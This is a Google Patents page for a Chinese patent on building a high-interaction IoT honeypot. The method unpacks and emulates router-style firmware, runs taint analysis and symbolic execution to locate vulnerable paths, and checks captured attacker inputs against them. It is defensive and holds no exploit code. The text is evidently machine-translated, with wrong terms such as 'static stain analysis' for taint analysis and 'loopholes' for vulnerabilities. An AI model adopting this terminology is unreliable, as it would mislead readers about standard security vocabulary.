CN116502226B - Firmware simulation-based high-interaction Internet of things honeypot deployment method and system - Google Patents
Firmware simulation-based high-interaction Internet of things honeypot deployment method and system Download PDFInfo
- Publication number
- CN116502226B CN116502226B CN202310763186.5A CN202310763186A CN116502226B CN 116502226 B CN116502226 B CN 116502226B CN 202310763186 A CN202310763186 A CN 202310763186A CN 116502226 B CN116502226 B CN 116502226B
- Authority
- CN
- China
- Prior art keywords
- firmware
- input information
- alarm
- honeypot
- binary
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
- 238000000034 method Methods 0.000 title claims abstract description 49
- 238000004088 simulation Methods 0.000 title claims abstract description 28
- 238000004458 analytical method Methods 0.000 claims abstract description 47
- 238000005516 engineering process Methods 0.000 claims abstract description 45
- 238000004891 communication Methods 0.000 claims abstract description 36
- 230000003068 static effect Effects 0.000 claims abstract description 28
- 235000012907 honey Nutrition 0.000 claims abstract description 13
- 238000010191 image analysis Methods 0.000 claims abstract description 7
- 230000006870 function Effects 0.000 claims description 21
- 230000008569 process Effects 0.000 claims description 15
- 238000012038 vulnerability analysis Methods 0.000 claims description 9
- 238000012216 screening Methods 0.000 claims description 5
- 238000004590 computer program Methods 0.000 claims description 3
- 238000010276 construction Methods 0.000 claims description 3
- 238000012795 verification Methods 0.000 claims description 3
- 230000003993 interaction Effects 0.000 abstract description 11
- 230000006399 behavior Effects 0.000 abstract description 4
- 238000012545 processing Methods 0.000 description 7
- 238000010586 diagram Methods 0.000 description 5
- 238000013515 script Methods 0.000 description 4
- 230000000694 effects Effects 0.000 description 3
- 238000005065 mining Methods 0.000 description 3
- 230000008901 benefit Effects 0.000 description 2
- 230000006835 compression Effects 0.000 description 2
- 238000007906 compression Methods 0.000 description 2
- 230000007123 defense Effects 0.000 description 2
- 238000001514 detection method Methods 0.000 description 2
- 230000002452 interceptive effect Effects 0.000 description 2
- 238000012544 monitoring process Methods 0.000 description 2
- 238000012546 transfer Methods 0.000 description 2
- 238000013459 approach Methods 0.000 description 1
- 230000009286 beneficial effect Effects 0.000 description 1
- 230000007547 defect Effects 0.000 description 1
- 238000011161 development Methods 0.000 description 1
- 239000002360 explosive Substances 0.000 description 1
- 238000002347 injection Methods 0.000 description 1
- 239000007924 injection Substances 0.000 description 1
- 238000011835 investigation Methods 0.000 description 1
- 238000012423 maintenance Methods 0.000 description 1
- 238000012986 modification Methods 0.000 description 1
- 230000004048 modification Effects 0.000 description 1
- 230000002688 persistence Effects 0.000 description 1
- 230000009862 primary prevention Effects 0.000 description 1
- 230000008439 repair process Effects 0.000 description 1
- 230000004044 response Effects 0.000 description 1
- 230000002441 reversible effect Effects 0.000 description 1
- 239000000243 solution Substances 0.000 description 1
- 230000001360 synchronised effect Effects 0.000 description 1
- 238000012360 testing method Methods 0.000 description 1
Classifications
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/55—Detecting local intrusion or implementing counter-measures
- G06F21/56—Computer malware detection or handling, e.g. anti-virus arrangements
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/55—Detecting local intrusion or implementing counter-measures
- G06F21/56—Computer malware detection or handling, e.g. anti-virus arrangements
- G06F21/562—Static detection
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F9/00—Arrangements for program control, e.g. control units
- G06F9/06—Arrangements for program control, e.g. control units using stored programs, i.e. using an internal store of processing equipment to receive or retain programs
- G06F9/44—Arrangements for executing specific programs
- G06F9/455—Emulation; Interpretation; Software simulation, e.g. virtualisation or emulation of application or operating system execution engines
-
- Y—GENERAL TAGGING OF NEW TECHNOLOGICAL DEVELOPMENTS; GENERAL TAGGING OF CROSS-SECTIONAL TECHNOLOGIES SPANNING OVER SEVERAL SECTIONS OF THE IPC; TECHNICAL SUBJECTS COVERED BY FORMER USPC CROSS-REFERENCE ART COLLECTIONS [XRACs] AND DIGESTS
- Y02—TECHNOLOGIES OR APPLICATIONS FOR MITIGATION OR ADAPTATION AGAINST CLIMATE CHANGE
- Y02D—CLIMATE CHANGE MITIGATION TECHNOLOGIES IN INFORMATION AND COMMUNICATION TECHNOLOGIES [ICT], I.E. INFORMATION AND COMMUNICATION TECHNOLOGIES AIMING AT THE REDUCTION OF THEIR OWN ENERGY USE
- Y02D30/00—Reducing energy consumption in communication networks
- Y02D30/50—Reducing energy consumption in communication networks in wire-line communication networks, e.g. low power modes or reduced link rate
Abstract
The application discloses a high-interaction Internet of things honeypot deployment method and system based on firmware simulation, comprising the following steps: acquiring firmware; carrying out mirror image analysis on the firmware, and analyzing the firmware mirror image by using a static stain analysis technology and a symbol execution technology to acquire alarm information of the firmware and input information for triggering an alarm; building a honey pot system on a cloud server, configuring a communicator used for communication between the honey pot system and the cloud server, and collecting input information of all cloud servers; and reconstructing the input information of the cloud server according to the alarm information of the firmware and the input information for triggering the alarm, verifying whether the input information of the cloud server triggers the vulnerability, and capturing threat information. According to the method, system-level simulation is carried out on the Internet of things equipment, the high-interaction Internet of things equipment honeypot is built, external input information can be collected in real time and analyzed, threat behaviors are captured, and interaction capacity and threat trapping capacity of the Internet of things honeypot system are further improved.
Description
Technical Field
The application belongs to the technical field of computer network security, relates to an Internet of things equipment firmware simulation technology, a static analysis technology and an Internet of things high-interaction honeypot technology, and particularly relates to a high-interaction Internet of things honeypot deployment method based on firmware simulation.
Background
The internet of things is an important component of a new generation of information technology, and is widely applied to various fields of economic and social development, such as industrial control systems, intelligent home, smart cities and the like. With the explosive growth of the application of the internet of things, the internet of things equipment is directly exposed in the internet, so that the internet of things equipment becomes a key target for hacking and a large number of security events are initiated.
Honeypots are a type of information system that aims to exploit information resources to attract attackers for unauthorized or illegal access in order to assist network security researchers in discovering, capturing, and analyzing offensive behaviors. The honeypot system consists of bait resources and a monitoring module. Decoy resources refer to devices, network services or information used to attract and confuse attackers, providing an available operating environment for the attack activity; the monitoring module is responsible for recording and analyzing all attack activities in the honeypot and guaranteeing the safety of the honeypot.
The Internet of things honeypot is a network information system which uses resources such as Internet of things computing, network, sensing and executing as baits and is used for discovering, capturing and analyzing the security threat of the Internet of things. The Internet of things honeypots are divided into a medium-low interaction honeypot type and a high interaction honeypot type according to the strength of interaction capability. The medium-low interaction honeypot is a honeypot which only realizes simulation of necessary communication interfaces of the Internet of things equipment. The network communication interface comprises SSH, HTTP, telnet, USB, bluetooth and other communication protocols, and is the basis for an attacker to implement network detection, target identification, exploit and other attacks. Through the collection and analysis of network traffic, threat information such as attack IP, request load and the like can be rapidly captured by the medium-low interaction honeypot. Because of the advantages of small scale, low deployment difficulty, high operation efficiency and easy maintenance, the medium-low interaction honeypot becomes a data acquisition tool of a security threat sensing platform. The high-interaction honeypot is a honeypot capable of comprehensively simulating the operation environment and service of the equipment of the Internet of things. These honeypots can often interact with an attacker for a long time and in multiple layers to achieve high simulation of a real Internet of things equipment system. The highly interactive honeypot provides the attacker with full access to the system, which will yield more information and allow more detailed analysis.
The technology of Firmware emulation of the internet of things, called Firmware Re-hosting (Firmware Re-hosting), refers to a process of migrating Firmware from an original hardware environment to a virtualized hardware environment. Some system-wide simulators, such as QEMU, may be used to virtualize the image of firmware as a bait resource for one honeypot. An advantage of using firmware images is that many manufacturers of internet of things devices, such as routers, may publish firmware images on their websites. Firmware emulation techniques can emulate a firmware image, which makes it very easy to deploy honeypots of various firmware. Linux-based firmware is often used by most internet of things equipment vendors. Firmadyne is a framework of firmware emulation that attempts to create a fully automated approach to re-host Linux-based firmware images, but has a low firmware emulation rate due to the numerous firmware versions. While the FirmAE framework may improve the success rate of the emulation by adding boot sequences, repairing lost file system structures, and using other repair procedures. In addition, by retrieving the IP address from an external DHCP server, network connectivity is improved.
Static analysis can discover vulnerabilities by analyzing program features without executing program code, and is the most commonly used automated analysis tool for general purpose computing platforms. Because the Internet of things equipment program is usually closed-source, the firmware can be reversely analyzed, the messages such as process variables, functions, structures and CFGs are recovered by using a plurality of reverse analysis tools or binary analysis platforms, and then vulnerability mining is carried out by combining with a plurality of traditional program static analysis technologies such as fuzzy hash and stain analysis. Firmware static taint analysis is an important technical branch of firmware static analysis, the main purpose of which is to discover sensitive information and taints in the firmware and track their flow paths in the firmware.
The existing high-interaction Internet of things honeypot is mainly based on real Internet of things equipment, and the acquired flow is forwarded to the real equipment through a network proxy and a flow forwarding technology, and then a response generated by the real equipment is returned. Honeypots based on real equipment are expensive to maintain and operate and cannot be deployed in large quantities. At present, honeypots based on QEMU framework simulation cannot cope with high-countermeasure attack and defense scenes due to the problem of firmware simulation technology, for example, after an attacker enters the honeypot, whether the honeypot is often judged by checking whether a Linux version corresponds to real equipment or not.
Disclosure of Invention
Aiming at the defects of the prior art, the application provides a high-interaction Internet of things honeypot deployment method and system based on firmware simulation.
According to a first aspect of an embodiment of the present application, there is provided a high-interaction internet of things honeypot deployment method based on firmware simulation, the method including:
acquiring firmware;
carrying out mirror image analysis on the firmware, and analyzing the firmware mirror image by using a static stain analysis technology and a symbol execution technology to acquire alarm information of the firmware and input information for triggering an alarm;
building a honey pot system on a cloud server, configuring a communicator used for communication between the honey pot system and the cloud server, and collecting input information of all cloud servers;
and reconstructing the input information of the cloud server according to the alarm information of the firmware and the input information for triggering the alarm, verifying whether the input information of the cloud server triggers the vulnerability, and capturing threat information.
Further, the firmware is mirrored, the static stain analysis technology and the symbol execution technology are used for analyzing the firmware mirror, and the alarm information of the firmware and the input information for triggering the alarm are obtained, including:
decompressing and decrypting the firmware image to obtain a corresponding file system;
analyzing each binary file in the file system, searching codes related to the network service contained in the binary file, simulating program execution by using a symbol execution technology, determining all code paths possibly encountered by the program during operation, and detecting code execution paths related to the network service;
constructing a binary dependency graph according to the communication modes among the binary files;
according to the binary dependency graph, the program data flow is tracked by utilizing a static stain analysis technology, and an alarm message, the input information for triggering the alarm and a vulnerable execution path are acquired.
Further, searching codes related to the network service contained in the binary file comprises the following steps:
the binary file with code related to the web service is a boundary binary file, which is an entry for vulnerability analysis.
Further, constructing a binary dependency graph according to a communication mode between binary files, including:
analyzing each binary file in the firmware image, and screening out the binary files containing function calls;
the function call is guided through the network keywords in the parameter register, the function call which contains codes related to network services and can be communicated between different binary files is determined, and the function call is marked as a communication basic block;
all the basic communication blocks are connected to obtain a binary dependency graph.
Further, a honeypot system is built on a cloud server, a communicator used for communication between the honeypot system and the cloud server is configured, and input information of all cloud servers is collected, and the honeypot system comprises:
simulating a firmware image by using a firmware framework;
building a honeypot system on a cloud server, and configuring a communicator; the communicator is used for managing communication between the honeypot system and the cloud server, managing a honeypot running process list and screening malicious processes.
Further, reconstructing input information of the cloud server according to alarm information of the firmware and input information for triggering the alarm, verifying whether the input information of the cloud server triggers a vulnerability, and capturing threat information, including:
aiming at a code execution path related to network service, acquiring path constraint conditions on the code execution path according to alarm information of firmware, and reconstructing a symbol expression of a program;
converting input information of a cloud server into input variables, simulating an execution process of a program by using a symbol execution technology, determining the polluted input variables, comparing the polluted input variables with path constraint conditions, and determining whether available vulnerabilities exist; threat intelligence is generated when there are available vulnerabilities.
According to a second aspect of the embodiment of the present application, there is provided a firmware simulation-based high-interaction internet of things honeypot deployment system, implementing the above-mentioned firmware simulation-based high-interaction internet of things honeypot deployment method, the system comprising:
the firmware acquisition module is used for acquiring firmware;
the alarm information acquisition module is used for carrying out mirror image analysis on the firmware, analyzing the firmware mirror image by using a static stain analysis technology and a symbol execution technology, and acquiring alarm information of the firmware and input information for triggering an alarm;
the cloud server input information acquisition module is used for configuring a communicator used for communication between the honey pot system and the cloud servers by building the honey pot system on the cloud servers and collecting input information of all the cloud servers;
the cloud server input information verification module is used for reconstructing the input information of the cloud server according to the alarm information of the firmware and the input information of triggering the alarm, verifying whether the input information of the cloud server triggers the vulnerability or not and capturing threat information.
Further, the alarm information acquisition module includes:
the boundary binary file searching sub-module is used for decompressing and decrypting the firmware image to obtain a corresponding file system; analyzing each binary file in the file system, searching codes related to the network service contained in the binary file, taking the binary file with the codes related to the network service as a boundary binary file, simulating program execution by using a symbol execution technology, determining all code paths possibly encountered by the program during operation, and detecting the code paths related to the network service;
the binary dependency graph construction submodule is used for constructing a binary dependency graph according to the communication modes among the binary files;
and the loophole searching sub-module is used for tracking the program data flow by utilizing a static stain analysis technology according to the binary dependency graph, and acquiring alarm information, input information for triggering an alarm and an vulnerable execution path.
According to a third aspect of embodiments of the present application, there is provided an electronic device comprising a memory and a processor, the memory being coupled to the processor; the processor is used for executing the program data to realize the high-interaction Internet of things honeypot deployment method based on firmware simulation.
According to a fourth aspect of the embodiment of the present application, there is provided a computer readable storage medium having stored thereon a computer program which, when executed by a processor, implements the above-described firmware emulation-based high-interaction internet of things honeypot deployment method.
Compared with the prior art, the application has the beneficial effects that:
(1) The application analyzes the firmware image by using a static stain analysis technology and a symbol execution technology, acquires the alarm information of the firmware and the input information for triggering the alarm, and can detect all stain propagation paths in the code, thereby providing an accurate safety analysis result.
(2) The application uses flow-based analysis technology different from traditional honeypots, performs reconstruction symbol execution on input information of a cloud server to perform vulnerability mining on the basis of performing static stain analysis on firmware, and has higher detection success rate.
(3) The application adopts firmware simulation technology, uses mature firmware framework to simulate firmware, can simulate various Internet of things equipment through the framework, supports various frameworks such as x86, ARM, MIPS and the like, can dynamically analyze the firmware, saves time and energy of safety personnel by an automation framework, and is simple and efficient.
(4) According to the application, by deploying the high-interaction honeypot system, an attacker can consider that the attacker attacks a real Internet of things device, complete attack behaviors can be recorded, and meanwhile, the attacker can be hidden to the greatest extent, so that the system can permanently monitor and capture the operation.
Drawings
In order to more clearly illustrate the technical solutions of the embodiments of the present application, the drawings that are needed in the description of the embodiments will be briefly described below, it being obvious that the drawings in the following description are only some embodiments of the present application, and that other drawings may be obtained according to these drawings without inventive effort to a person skilled in the art.
FIG. 1 is a flowchart of a high-interaction Internet of things honeypot deployment method based on firmware simulation, which is provided by an embodiment of the application;
FIG. 2 is a schematic diagram of firmware analysis according to an embodiment of the present application;
FIG. 3 is a schematic diagram of a deployment honeypot provided by an embodiment of the application;
FIG. 4 is a schematic diagram of a high-interaction Internet of things honeypot deployment system based on firmware simulation provided by an embodiment of the application;
fig. 5 is a schematic diagram of an electronic device according to an embodiment of the present application.
Detailed Description
Embodiments of the application are disclosed in the drawings, and for purposes of explanation, numerous practical details are set forth in the following description. However, it should be understood that these practical details are not to be taken as limiting the application. That is, in some embodiments of the application, these practical details are non-fixed.
As shown in fig. 1, an embodiment of the present application provides a firmware emulation-based high-interaction internet of things honeypot deployment method, which includes:
step S1, obtaining firmware.
It should be noted that, the present application crawls corresponding firmware on the network of the device or directly reads the storage medium (such as flash memory chip, hard disk, etc.) of the device.
And S2, carrying out mirror image analysis on the firmware, and analyzing the firmware mirror image by using a static stain analysis technology and a symbol execution technology to acquire alarm information of the firmware and input information for triggering an alarm.
Specifically, as shown in fig. 2, the step S2 specifically includes the following substeps:
step S201, decompressing and decrypting the firmware image to obtain a corresponding file system.
In this example, a Binwalk tool is used to decompress and decrypt the firmware image to obtain the corresponding file system of the firmware.
Step S202, each binary file in the file system is analyzed, codes related to the network service contained in the binary file are searched, the execution of the program is simulated by using a symbol execution technology, all code paths possibly encountered by the program during operation are determined, and the code execution paths related to the network service are detected.
Further, the binary file having the code related to the web service is a boundary binary file, which is an entry of vulnerability analysis.
Step S203, constructing a binary dependency graph according to the communication modes among the binary files.
Specifically, each binary file in the firmware image is analyzed, which contains the function call is determined, and the binary file containing the function call is screened out.
Then, it is checked whether each function call contains a code related to the web service, which is marked as a basic block that may cause communication.
Next, by directing function calls through the network key in the parameter register, it is determined which function calls are actually related to the network service and can be communicated between different binary files, labeled as a communication basic block.
Finally, all the communication basic blocks are connected, and a binary dependency graph connected with all the binary files is constructed to detect the communication modes among the binary files, and meanwhile, the interaction modes among different components in the firmware image are better understood.
Step S204, tracking program data flow by utilizing a static stain analysis technology according to the binary dependency graph constructed in the step S203, determining which data reach a communication basic block possibly having a vulnerability, and acquiring alarm information, input information for triggering an alarm and a vulnerable execution path. The alarm information comprises a vulnerability type and a vulnerability position.
Deep analysis is performed on a single binary file and determines whether a known vulnerability exists therein and marks a basic block where the vulnerability may exist.
For a plurality of binary files, the static stain analysis is used in combination with the binary dependency graph constructed in step S203 to track the program data stream and determine which data may reach the basic blocks where the loopholes exist, and finally, the alarm information and the input information for triggering the alarm are stored.
Step S3: and building a honeypot system on the cloud server, configuring a communicator for communication between the honeypot system and the cloud server, and collecting input information of all cloud servers.
Specifically, as shown in fig. 3, the step S3 specifically includes:
firmware images were simulated using the FirmAE framework. The firmware image is firstly subjected to primary prevention, system calls to a file system and a network are intercepted, various system logs are collected, and system and network configuration is deduced; and combining the pre-simulation information to finally realize simulation.
A communicator is configured at the cloud server and is responsible for managing communications between the honeypot system and the cloud server, and the communicator establishes a secure communication channel for transmitting data between the honeypot system and the cloud server. In particular, the communicator is also configured to retrieve a list of honeypot active processes, view the processes currently running, and determine which processes are likely malicious, screening for malicious processes.
Step S4: and (3) reconstructing the input information of the cloud server based on the alarm information and the input information for triggering the alarm obtained in the step (S2), verifying whether the input information of the cloud server triggers the vulnerability, and capturing threat information.
Specifically, as shown in fig. 3, the step S4 specifically includes:
step S401: and (3) analyzing the path constraint condition on the code execution path according to the alarm information obtained in the step (S2) and the input information for triggering the alarm aiming at the code execution path obtained in the step (S2), and reconstructing the symbol expression of the program.
Step S402: the input information of the cloud server is converted into input variables, and a program execution process is simulated by using a symbolic execution technology to determine which input variables are polluted. These contaminated input variables are compared to path constraints and constraint solving techniques are used to determine if there are available vulnerabilities. If an availability vulnerability exists, threat intelligence is generated.
Example 1
Step S1: the firmware obtaining and analyzing method comprises the steps of obtaining firmware information on a device official network and analyzing binary data of the firmware, wherein the method comprises the following steps:
downloading a firmware compression packet on a official network provided by a device manufacturer by using a web crawler; for firmware which does not provide a downloaded web page, the firmware directly reads the storage medium (such as a flash memory chip, a hard disk, etc.) of the device through hardware, and creates a complete image file. Reading the storage medium of the device using a specific hardware device or software tool or reading the storage of the device using a burner or programmer through a JTAG or UART interface connected to the device; and integrating and classifying all the collected firmware information, classifying and summarizing according to the information such as the equipment brand, the equipment type, the equipment model and the like, and facilitating the unified management in the later period.
Step S2: and (3) firstly analyzing the firmware acquired in the step (S1) by using Binwalk, then analyzing by using Karonte framework, and analyzing by using static stain analysis and symbol execution technology to obtain alarm information and a file of an alarm related input source which can be analyzed by a honeypot. The method comprises the following steps:
firmware analysis: the firmware of the internet of things device mainly comprises four parts, namely a Header, a bootstrap (BootLoader), a Kernel Code (Kernel Code) and a Root file system (Root file system). Firmware parsing is based on feature recognition, and various forms of unpacking and processing are performed on the original binary firmware code. The format parsing mainly comprises: firmware header identification, bootloader type identification, operating system type identification, compression format identification, file system investigation analysis and instruction set type identification, and extracting files in firmware based on the identification of the types, reading internal configuration files and code functions, and extracting key information for reference. And analyzing the firmware by using a third-party firmware analysis tool Binwalk to acquire a firmware image.
And (3) firmware analysis: firmware analysis is based on the karote framework implementation. The frame is divided into three steps: searching a boundary binary file, constructing a binary dependency graph and finding loopholes. The framework can perform static stain analysis and symbolic execution on the firmware image, and detect loopholes in the binary program. The firmware analyzer takes the firmware image as input, analyzes the image and returns two outputs: a file containing vulnerability alerts and a file of alert-related input sources.
Further explanation of finding boundary binaries, building binary dependency graphs, and discovering vulnerabilities follows:
boundary binary file lookup: after the file system is extracted, the firmware is analyzed. The goal is to detect a smuggling vulnerability of a network interface intrusion. To this end, the firmware analyzer needs to discover which binary files in the firmware image have network services and mark these files as blobs for subsequent blobs analysis. These binary files are network oriented binary files that represent entry points for vulnerability analysis.
Constructing a binary dependency graph: the application can detect single binary and multiple binary vulnerabilities. Multiple binary vulnerabilities often use a communication paradigm to transfer information between binary files. For example, one binary file sets the STRING "query_string" as the environment variable, and the other binary file retrieves the environment variable for the STRING. The goal of the binary dependency graph module is to detect these communication patterns and construct a graph that links all binary files.
Firstly, carrying out static analysis on a target binary program, analyzing the structure of the binary program, including functions, code blocks, instructions and the like, and extracting symbol information in the program. Symbol reference relationships in the binary programs are analyzed, calling relationships among functions, use of library functions, reference of global variables and the like are identified, and direct and indirect dependency relationships among the binary programs are established. In addition, control and data streams of binary programs are analyzed to determine interactions between the programs, and call paths, data transfer paths, and variable dependencies between functions are tracked.
Searching loopholes: after the binary dependency is constructed, analysis is performed to detect vulnerabilities in the binary. Including multi-binary vulnerability analysis and single binary vulnerability analysis. Multiple binary vulnerability analysis is often adopted first, and vulnerabilities of binary file interaction are detected through static stain analysis on multiple binary files. If no loopholes are detected, binary loopholes analysis is performed, and the loopholes in the single binary file can be detected and analyzed through static analysis of the single binary file, such as buffer overflow, formatting character string loopholes, code injection and the like. However, single binary vulnerability analysis detects false positives high compared to multiple binary vulnerability analysis.
After discovering vulnerabilities and vulnerable execution paths, these alert messages need to be parsed further so that they can be used in honeypots. In addition, the location where the input information is collected is determined according to the vulnerable execution path so that the required input information is collected in the honeypot. The alarm information of the firmware is converted into an input collection position (input source) of the honeypot by source parsing.
Step S3: and (3) simulating the firmware information acquired in the step S1 through a FirmAE framework, and designing a communicator. And building a honey pot system. The method comprises the following steps:
downloading and installing the firmware framework, detecting whether the firmware image can be successfully simulated through a check function in the firmware framework, and deducing the network configuration of the firmware image. Once it is determined that simulation is enabled, the FirmAE framework will run the firmware image in Debug mode, building the honeypot.
A communicator is configured for communication between the honeypot system and the cloud server. The honeypot will open a netcat session while the cloud server starts up the communicator, connects the communicator to the netcat server on the honeypot, and retrieves the list of active processes and starts up one TCPDUMP session to capture all incoming network traffic.
The communicator initiates the GDB service (GNU symbolic debugger) of the cloud server, the initiated GDB server connects to the honeypot, sets a debug script that controls how the binary file inputs are collected and manages the actual input set.
FIG. 3 shows the operational flow of the honeypot and interactions with the cloud server, including:
starting with the firmware analyzer output and firmware image, a debug script is generated from the alert information, after which the GDB is used to control the collection of input information on the honeypot. After these scripts are generated, the FirmAE framework is instantiated, the firmware is extracted and ready to be mirrored by the custom Linux kernel and firmware. The firmware framework then tests whether the firmware image can successfully emulate and automatically set up a network connection. After the setup phase is completed, the honeypot is started and executed. The honeypot opens a netcat session and the cloud server host initiates the F-custom communicator. The communicator connects to a netcat server on the honeypot, retrieves the active process list, and initiates a TCPDUMP session to capture all incoming network traffic. Based on the program activity list and the list of symbolic connections, the communicator wants the honeypot to send a command to start the GDB server, execute a debug script on the cloud service host system and connect to the GDB server on the honeypot to remotely collect input.
Step S4: and (3) verifying whether the input collected by the honeypot actually triggers the vulnerability or not by reconstructing the execution state of the input information of the cloud server by combining the input information of the cloud server obtained in the step (S3), the alarm information of the firmware collected in the step (S2) and the input information for triggering the alarm, and capturing threat information. In addition, the network traffic information acquired in the step S3 may be subjected to a fingerprint-based traffic analysis technique to capture threat information.
And (3) verifying whether the cloud server input information obtained in the step (S3) triggers an actual vulnerability or not by using the reconstruction execution state, further capturing threat information, and recording the input information, the execution flow record, the vulnerability type and the position in a database, thereby facilitating countermeasures and defenses.
Further, collecting vulnerability information of different types and models of Internet of things equipment through network data or experimental data, establishing a complete vulnerability utilization database, and extracting feature information of induced vulnerabilities; the access flow of equipment in the honeypot is monitored in real time, database synchronous comparison is carried out on some threat data, the obtained threat information is synchronously recorded in the mysql database, the later backtracking is convenient, in addition, the attack path of an attacker is obtained through the related log information in the honeypot, statistics is timely carried out, and high interactive operation is carried out, so that the concealment and persistence of the system are ensured.
In summary, the application analyzes the characteristic information of the firmware by using the binwalk tool, analyzes the firmware by combining with the technologies such as static stain analysis, simulates the firmware mirror image by using the firmware ae frame, effectively monitors and captures the network traffic in real time by deploying the honeypot system in the virtualized environment, analyzes the network traffic into the input information, and performs vulnerability mining by combining the input information with the alarm information, thereby improving the capability of the system for defending various attack behaviors and constructing a safer and more reliable system safety protection system.
As shown in fig. 4, the application further provides a firmware simulation-based high-interaction internet of things honeypot deployment system, which is used for implementing the firmware simulation-based high-interaction internet of things honeypot deployment method, and the system comprises:
and the firmware acquisition module is used for acquiring the firmware.
The alarm information acquisition module is used for carrying out mirror image analysis on the firmware, analyzing the firmware mirror image by using a static stain analysis technology and a symbol execution technology, and acquiring alarm information of the firmware and input information for triggering an alarm.
Further, the alarm information acquisition module includes:
the boundary binary file searching sub-module is used for decompressing and decrypting the firmware image to obtain a corresponding file system; each binary file in the file system is analyzed, codes related to the network service are searched for, the binary file with the codes related to the network service is taken as a boundary binary file, the execution of the program is simulated by using a symbol execution technology, all code paths possibly encountered by the program during operation are determined, and the code paths related to the network service are detected.
And the binary dependency graph construction submodule is used for constructing a binary dependency graph according to the communication modes among the binary files.
And the loophole searching sub-module is used for tracking the program data flow by utilizing a static stain analysis technology according to the binary dependency graph, and acquiring alarm information, input information for triggering an alarm and an vulnerable execution path.
The cloud server input information acquisition module is used for configuring a communicator used for communication between the honey pot system and the cloud servers by building the honey pot system on the cloud servers and collecting input information of all the cloud servers.
The cloud server input information verification module is used for reconstructing the input information of the cloud server according to the alarm information of the firmware and the input information of triggering the alarm, verifying whether the input information of the cloud server triggers the vulnerability or not and capturing threat information.
Correspondingly, the application also provides electronic equipment, which comprises: one or more processors; a memory for storing one or more programs; and when the one or more programs are executed by the one or more processors, the one or more processors are caused to implement the high-interaction Internet of things honeypot deployment method based on firmware simulation. As shown in fig. 5, a hardware structure diagram of any device with data processing capability, where the firmware simulation-based high-interaction internet of things honeypot deployment method is located, is shown in fig. 5, and in addition to the processor, the memory and the network interface shown in fig. 5, any device with data processing capability in the embodiment may generally include other hardware according to the actual function of the any device with data processing capability, which is not described herein.
Correspondingly, the application also provides a computer readable storage medium, wherein computer instructions are stored on the computer readable storage medium, and when the instructions are executed by a processor, the high-interaction Internet of things honeypot deployment method based on firmware simulation is realized. The computer readable storage medium may be an internal storage unit, such as a hard disk or a memory, of any of the data processing enabled devices described in any of the previous embodiments. The computer readable storage medium may also be an external storage device, such as a plug-in hard disk, a Smart Media Card (SMC), an SD Card, a Flash memory Card (Flash Card), or the like, provided on the device. Further, the computer readable storage medium may include both internal storage units and external storage devices of any device having data processing capabilities. The computer readable storage medium is used for storing the computer program and other programs and data required by the arbitrary data processing apparatus, and may also be used for temporarily storing data that has been output or is to be output.
The foregoing description of the preferred embodiments of the application is not intended to be limiting, but rather is intended to cover all modifications, equivalents, alternatives, and improvements that fall within the spirit and scope of the application.
Claims (9)
1. A firmware simulation-based high-interaction Internet of things honeypot deployment method is characterized by comprising the following steps:
acquiring firmware;
carrying out mirror image analysis on the firmware, and analyzing the firmware mirror image by using a static stain analysis technology and a symbol execution technology to acquire alarm information of the firmware and input information for triggering an alarm;
building a honey pot system on a cloud server, configuring a communicator used for communication between the honey pot system and the cloud server, and collecting input information of all cloud servers;
reconstructing the input information of the cloud server according to the alarm information of the firmware and the input information of the triggering alarm, verifying whether the input information of the cloud server triggers the vulnerability, and capturing threat information;
the method for obtaining the alarm information of the firmware and triggering the input information of the alarm comprises the steps of:
decompressing and decrypting the firmware image to obtain a corresponding file system;
analyzing each binary file in the file system, searching codes related to the network service contained in the binary file, simulating program execution by using a symbol execution technology, determining all code paths possibly encountered by the program during operation, and detecting code execution paths related to the network service;
constructing a binary dependency graph according to the communication modes among the binary files;
according to the binary dependency graph, the program data flow is tracked by utilizing a static stain analysis technology, and an alarm message, the input information for triggering the alarm and a vulnerable execution path are acquired.
2. The firmware emulation-based high-interaction internet of things honeypot deployment method of claim 1, wherein searching for code related to a web service contained in a binary file comprises:
the binary file with code related to the web service is a boundary binary file, which is an entry for vulnerability analysis.
3. The firmware emulation-based high-interaction internet of things honeypot deployment method of claim 1, wherein constructing a binary dependency graph according to a communication mode between binary files comprises:
analyzing each binary file in the firmware image, and screening out the binary files containing function calls;
the function call is guided through the network keywords in the parameter register, the function call which contains codes related to network services and can be communicated between different binary files is determined, and the function call is marked as a communication basic block;
all the basic communication blocks are connected to obtain a binary dependency graph.
4. The firmware emulation-based high-interaction internet of things honeypot deployment method of claim 1, wherein building a honeypot system on a cloud server, configuring a communicator for communication between the honeypot system and the cloud server, and collecting input information of all cloud servers, comprises:
simulating a firmware image by using a firmware framework;
building a honeypot system on a cloud server, and configuring a communicator; the communicator is used for managing communication between the honeypot system and the cloud server, managing a honeypot running process list and screening malicious processes.
5. The firmware emulation-based high-interaction internet of things honeypot deployment method of claim 1, wherein reconstructing input information of a cloud server according to alarm information of firmware and input information triggering an alarm, verifying whether the input information of the cloud server triggers a vulnerability, and capturing threat information comprises:
aiming at a code execution path related to network service, acquiring path constraint conditions on the code execution path according to alarm information of firmware, and reconstructing a symbol expression of a program;
converting input information of a cloud server into input variables, simulating an execution process of a program by using a symbol execution technology, determining the polluted input variables, comparing the polluted input variables with path constraint conditions, and determining whether available vulnerabilities exist; threat intelligence is generated when there are available vulnerabilities.
6. A firmware emulation-based high-interaction internet of things honeypot deployment system, characterized in that it is configured to implement the firmware emulation-based high-interaction internet of things honeypot deployment method of any one of claims 1-5, the system comprising:
the firmware acquisition module is used for acquiring firmware;
the alarm information acquisition module is used for carrying out mirror image analysis on the firmware, analyzing the firmware mirror image by using a static stain analysis technology and a symbol execution technology, and acquiring alarm information of the firmware and input information for triggering an alarm;
